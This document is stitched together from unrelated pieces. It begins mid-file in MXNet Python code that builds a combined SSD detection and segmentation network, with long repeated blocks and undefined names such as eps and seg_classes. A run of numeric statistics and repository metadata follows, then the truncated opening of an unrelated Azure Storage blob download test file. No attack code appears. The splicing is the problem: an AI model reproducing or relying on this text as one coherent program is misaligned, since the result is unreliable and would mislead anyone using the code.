score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy, score3_samp0, score3_sampx, dim=1, name='score3_concat')
score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score3_conv_bn')
score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4,4), stride=(2,2), pad=(1,1), \
num_filter=seg_classes, workspace=1024, name="score4_conv")
fcnxs = mx.symbol.SoftmaxOutput(data=score4_conv, multi_output=True, grad_scale=4., \
use_ignore=True, ignore_label=255, name="seg_out")
# group output
out = mx.symbol.Group([fcnxs])
return out
def get_seg_symbol(network, num_classes, from_layers, num_filters, sizes, ratios,
strides, pads, normalizations=-1, steps=[], min_filter=128,
nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
"""Build network for testing SSD
Parameters
----------
network : str
base network symbol name
num_classes : int
number of object classes not including background
from_layers : list of str
feature extraction layers, use '' for add extra layers
For example:
from_layers = ['relu4_3', 'fc7', '', '', '', '']
which means extract feature from relu4_3 and fc7, adding 4 extra layers
on top of fc7
num_filters : list of int
number of filters for extra layers, you can use -1 for extracted features,
however, if normalization and scale is applied, the number of filter for
that layer must be provided.
For example:
num_filters = [512, -1, 512, 256, 256, 256]
strides : list of int
strides for the 3x3 convolution appended, -1 can be used for extracted
feature layers
pads : list of int
paddings for the 3x3 convolution, -1 can be used for extracted layers
sizes : list or list of list
[min_size, max_size] for all layers or [[], [], []...] for specific layers
ratios : list or list of list
[ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
normalizations : int or list of int
use normalizations value for all layers or [...] for specific layers,
-1 indicate no normalizations and scales
steps : list
specify steps for each MultiBoxPrior layer, leave empty, it will calculate
according to layer dimensions
min_filter : int
minimum number of filters used in 1x1 convolution
nms_thresh : float
non-maximum suppression threshold
force_suppress : boolean
whether suppress different class objects
nms_topk : int
apply NMS to top K detections
Returns
-------
mx.Symbol
"""
body = import_module(network).get_symbol(num_classes, **kwargs)
internals = body.get_internals()
data = internals['data']
res3 = internals[from_layers[0]+"_output"]
res4 = internals[from_layers[1]+"_output"]
conv_feat = internals[from_layers[2]+"_output"]
# segmentation task (pyramid pooling module)
res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced_bn')
res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced2_bn')
res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced_bn')
res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced2_bn')
res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
res5_reduced_bn = mx.sym.BatchNorm(data=conv_feat, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res5_reduced_bn')
score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1,1), stride=(1,1), pad=(0,0), pool_type='avg', name='score_pool1')
score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2,2), stride=(2,2), pad=(0,0), pool_type='avg', name='score_pool2')
score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4,4), stride=(4,4), pad=(0,0), pool_type='avg', name='score_pool4')
score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool4_bn')
score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool2_bn')
score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool1_bn')
affine_matrix = mx.sym.var("affine_matrix", shape=(1,6))
grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy, score3_samp0, score3_sampx, dim=1, name='score3_concat')
score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score3_conv_bn')
score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4,4), stride=(2,2), pad=(1,1), \
num_filter=seg_classes, workspace=1024, name="score4_conv")
fcnxs = mx.symbol.softmax(data=score4_conv, multi_output=True, name="seg_out")
# group output
out = mx.symbol.Group([fcnxs])
return out
#------------------------------------------------------------------
# SINGLE TASK: DETECTION + SEGMENTATION + DEPTH ESTIMATION
#------------------------------------------------------------------
def get_multi_symbol_train(network, num_classes, from_layers, num_filters, strides, pads,
sizes, ratios, normalizations=-1, steps=[], min_filter=128,
nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
"""Build network symbol for training SSD
Parameters
----------
network : str
base network symbol name
num_classes : int
number of object classes not including background
from_layers : list of str
feature extraction layers, use '' for add extra layers
For example:
from_layers = ['relu4_3', 'fc7', '', '', '', '']
which means extract feature from relu4_3 and fc7, adding 4 extra layers
on top of fc7
num_filters : list of int
number of filters for extra layers, you can use -1 for extracted features,
however, if normalization and scale is applied, the number of filter for
that layer must be provided.
For example:
num_filters = [512, -1, 512, 256, 256, 256]
strides : list of int
strides for the 3x3 convolution appended, -1 can be used for extracted
feature layers
pads : list of int
paddings for the 3x3 convolution, -1 can be used for extracted layers
sizes : list or list of list
[min_size, max_size] for all layers or [[], [], []...] for specific layers
ratios : list or list of list
[ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
normalizations : int or list of int
use normalizations value for all layers or [...] for specific layers,
-1 indicate no normalizations and scales
steps : list
specify steps for each MultiBoxPrior layer, leave empty, it will calculate
according to layer dimensions
min_filter : int
minimum number of filters used in 1x1 convolution
nms_thresh : float
non-maximum suppression threshold
force_suppress : boolean
whether suppress different class objects
nms_topk : int
apply NMS to top K detections
Returns
-------
mx.Symbol
"""
label = mx.sym.Variable('label_det')
body = import_module(network).get_symbol(num_classes, **kwargs)
internals = body.get_internals()
data = internals['data']
res3 = internals[from_layers[0]+"_output"]
res4 = internals[from_layers[1]+"_output"]
conv_feat = internals[from_layers[2]+"_output"]
### remove res3 from input layer of SSD
from_layers=from_layers[1:]
num_filters=num_filters[1:]
strides=strides[1:]
pads=pads[1:]
sizes=sizes[1:]
ratios=ratios[1:]
layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
min_filter=min_filter)
loc_preds, cls_preds, anchor_boxes = multitask_layer(layers, \
num_classes, sizes=sizes, ratios=ratios, normalization=normalizations, \
num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
tmp = mx.contrib.symbol.MultiBoxTarget(
*[anchor_boxes, label, cls_preds], overlap_threshold=.5, \
ignore_label=-1, negative_mining_ratio=3, minimum_negative_samples=0, \
negative_mining_thresh=.5, variances=(0.1, 0.1, 0.2, 0.2),
name="multibox_target")
loc_target = tmp[0]
loc_target_mask = tmp[1]
cls_target = tmp[2]
cls_prob = mx.symbol.SoftmaxOutput(data=cls_preds, label=cls_target, \
ignore_label=-1, use_ignore=True, grad_scale=1., multi_output=True, \
normalization='valid', name="cls_prob")
loc_loss_ = mx.symbol.smooth_l1(name="loc_loss_", \
data=loc_target_mask * (loc_preds - loc_target), scalar=1.0)
loc_loss = mx.symbol.MakeLoss(loc_loss_, grad_scale=1., \
normalization='valid', name="loc_loss")
# monitoring training status
cls_label = mx.symbol.MakeLoss(data=cls_target, grad_scale=0, name="cls_label")
det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes], \
name="detection", nms_threshold=nms_thresh, force_suppress=force_suppress,
variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
det = mx.symbol.MakeLoss(data=det, grad_scale=0, name="det_out")
# segmentation task (pyramid pooling module)
res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced_bn')
res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced2_bn')
res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced_bn')
res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced2_bn')
res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
res5_reduced_bn = mx.sym.BatchNorm(data=conv_feat, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res5_reduced_bn')
score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1,1), stride=(1,1), pad=(0,0), pool_type='avg', name='score_pool1')
score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2,2), stride=(2,2), pad=(0,0), pool_type='avg', name='score_pool2')
score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4,4), stride=(4,4), pad=(0,0), pool_type='avg', name='score_pool4')
score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool4_bn')
score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool2_bn')
score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool1_bn')
affine_matrix = mx.sym.var("affine_matrix", shape=(1,6))
grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy, score3_samp0, score3_sampx, dim=1, name='score3_concat')
score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score3_conv_bn')
score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4,4), stride=(2,2), pad=(1,1), \
num_filter=seg_classes, workspace=1024, name="score4_conv")
fcnxs = mx.symbol.SoftmaxOutput(data=score4_conv, multi_output=True, grad_scale=4., \
use_ignore=True, ignore_label=255, name="seg_out")
# group output
out = mx.symbol.Group([cls_prob, loc_loss, cls_label, det, fcnxs])
return out
def get_multi_symbol(network, num_classes, from_layers, num_filters, sizes, ratios,
strides, pads, normalizations=-1, steps=[], min_filter=128,
nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
"""Build network for testing SSD
Parameters
----------
network : str
base network symbol name
num_classes : int
number of object classes not including background
from_layers : list of str
feature extraction layers, use '' for add extra layers
For example:
from_layers = ['relu4_3', 'fc7', '', '', '', '']
which means extract feature from relu4_3 and fc7, adding 4 extra layers
on top of fc7
num_filters : list of int
number of filters for extra layers, you can use -1 for extracted features,
however, if normalization and scale is applied, the number of filter for
that layer must be provided.
For example:
num_filters = [512, -1, 512, 256, 256, 256]
strides : list of int
strides for the 3x3 convolution appended, -1 can be used for extracted
feature layers
pads : list of int
paddings for the 3x3 convolution, -1 can be used for extracted layers
sizes : list or list of list
[min_size, max_size] for all layers or [[], [], []...] for specific layers
ratios : list or list of list
[ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
normalizations : int or list of int
use normalizations value for all layers or [...] for specific layers,
-1 indicate no normalizations and scales
steps : list
specify steps for each MultiBoxPrior layer, leave empty, it will calculate
according to layer dimensions
min_filter : int
minimum number of filters used in 1x1 convolution
nms_thresh : float
non-maximum suppression threshold
force_suppress : boolean
whether suppress different class objects
nms_topk : int
apply NMS to top K detections
Returns
-------
mx.Symbol
"""
body = import_module(network).get_symbol(num_classes, **kwargs)
internals = body.get_internals()
data = internals['data']
res3 = internals[from_layers[0]+"_output"]
res4 = internals[from_layers[1]+"_output"]
conv_feat = internals[from_layers[2]+"_output"]
### remove res3 from input layer of SSD
from_layers=from_layers[1:]
num_filters=num_filters[1:]
strides=strides[1:]
pads=pads[1:]
sizes=sizes[1:]
ratios=ratios[1:]
layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
min_filter=min_filter)
loc_preds, cls_preds, anchor_boxes = multitask_layer(layers, \
num_classes, sizes=sizes, ratios=ratios, normalization=normalizations, \
num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
cls_prob = mx.symbol.SoftmaxActivation(data=cls_preds, mode='channel', \
name='cls_prob')
det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes], \
name="detection", nms_threshold=nms_thresh, force_suppress=force_suppress, \
variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
# segmentation task (pyramid pooling module)
res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced_bn')
res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced2_bn')
res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced_bn')
res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced2_bn')
res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
res5_reduced_bn = mx.sym.BatchNorm(data=conv_feat, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res5_reduced_bn')
score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1,1), stride=(1,1), pad=(0,0), pool_type='avg', name='score_pool1')
score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2,2), stride=(2,2), pad=(0,0), pool_type='avg', name='score_pool2')
score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4,4), stride=(4,4), pad=(0,0), pool_type='avg', name='score_pool4')
score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool4_bn')
score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool2_bn')
score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1,1), stride=(1,1), pad=(0,0), \
num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool1_bn')
affine_matrix = mx.sym.var("affine_matrix", shape=(1,6))
grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy, score3_samp0, score3_sampx, dim=1, name='score3_concat')
score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3,3), stride=(1,1), pad=(1,1), \
num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score3_conv_bn')
score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4,4), stride=(2,2), pad=(1,1), \
num_filter=seg_classes, workspace=1024, name="score4_conv")
fcnxs = mx.symbol.softmax(data=score4_conv, multi_output=True, name="seg_out")
# group output
out = mx.symbol.Group([det, fcnxs])
return out
| 54.737276
| 146
| 0.691159
| 5,782
| 39,794
| 4.539606
| 0.045313
| 0.021144
| 0.038936
| 0.016763
| 0.982018
| 0.981027
| 0.981027
| 0.97977
| 0.97977
| 0.97977
| 0
| 0.04832
| 0.178293
| 39,794
| 726
| 147
| 54.812672
| 0.754396
| 0.279263
| 0
| 0.940171
| 0
| 0
| 0.075654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019943
| false
| 0
| 0.037037
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2240cf28d0f34b7f8a953e0e98a9d8138d1e0eeb
| 39,253
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_get_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/storage/azure-storage-blob/tests/test_get_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/storage/azure-storage-blob/tests/test_get_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2016-04-19T22:15:47.000Z
|
2016-04-19T22:15:47.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import base64
import unittest
import uuid
from os import path, remove, sys, urandom
from azure.core.exceptions import HttpResponseError
from devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer
from azure.storage.blob import (
BlobServiceClient,
ContainerClient,
BlobClient,
StorageErrorCode,
BlobProperties
)
from _shared.testcase import GlobalStorageAccountPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
# ------------------------------------------------------------------------------
class StorageGetBlobTest(StorageTestCase):
def _setup(self, storage_account, key):
# test chunking functionality by reducing the threshold
# for chunking and the size of each chunk, otherwise
# the tests would take too long to execute
self.bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=key,
max_single_get_size=1024,
max_chunk_get_size=1024)
self.config = self.bsc._config
self.container_name = self.get_resource_name('utcontainer')
if self.is_live:
container = self.bsc.get_container_client(self.container_name)
try:
container.create_container()
except:
pass
self.byte_blob = self.get_resource_name('byteblob')
self.byte_data = self.get_random_bytes(64 * 1024 + 5)
if self.is_live:
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
blob.upload_blob(self.byte_data, overwrite=True)
def _teardown(self, file_name):
if path.isfile(file_name):
try:
remove(file_name)
except:
pass
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
class NonSeekableFile(object):
def __init__(self, wrapped_file):
self.wrapped_file = wrapped_file
def write(self, data):
self.wrapped_file.write(data)
def read(self, count):
return self.wrapped_file.read(count)
def seekable(self):
return False
# -- Get test cases for blobs ----------------------------------------------
@GlobalStorageAccountPreparer()
def test_unicode_get_blob_unicode_data(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = u'hello world啊齄丂狛狜'.encode('utf-8')
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
content = blob.download_blob()
# Assert
self.assertIsInstance(content.properties, BlobProperties)
self.assertEqual(content.readall(), blob_data)
@GlobalStorageAccountPreparer()
def test_unicode_get_blob_binary_data(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
base64_data = 'AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/w=='
binary_data = base64.b64decode(base64_data)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(binary_data)
# Act
content = blob.download_blob()
# Assert
self.assertIsInstance(content.properties, BlobProperties)
self.assertEqual(content.readall(), binary_data)
@GlobalStorageAccountPreparer()
def test_get_blob_no_content(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = b''
